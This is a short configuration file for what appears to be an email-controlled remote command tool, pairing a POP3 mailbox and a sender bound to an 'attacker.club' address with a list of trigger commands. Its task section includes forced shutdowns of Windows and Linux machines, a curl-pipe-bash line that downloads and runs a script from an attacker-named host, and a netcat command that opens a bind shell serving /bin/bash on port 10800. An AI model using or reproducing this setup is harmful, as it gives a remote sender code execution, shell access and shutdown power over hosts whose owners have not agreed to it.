[mail]
# The receiver
POP3_HOST = pop.exmail.qq.com
email = alert@xxxx.com
password = xxxxxx
# The sender
Bind_Sender = admin@attacker.club

[task]
# Shutdown Windows
shutdown = shutdown -s -f -t 1
# Shutdown  Linux
linux_down = init 0
# Executing remote scripts
curl_bash = curl -s http://list.attacker.club/touch.sh | bash
# CMDSHELL
my_ladder = nc -vv -l -p 10800 -e /bin/bash
# Close all tasks
clear = pkill nc && pkill python
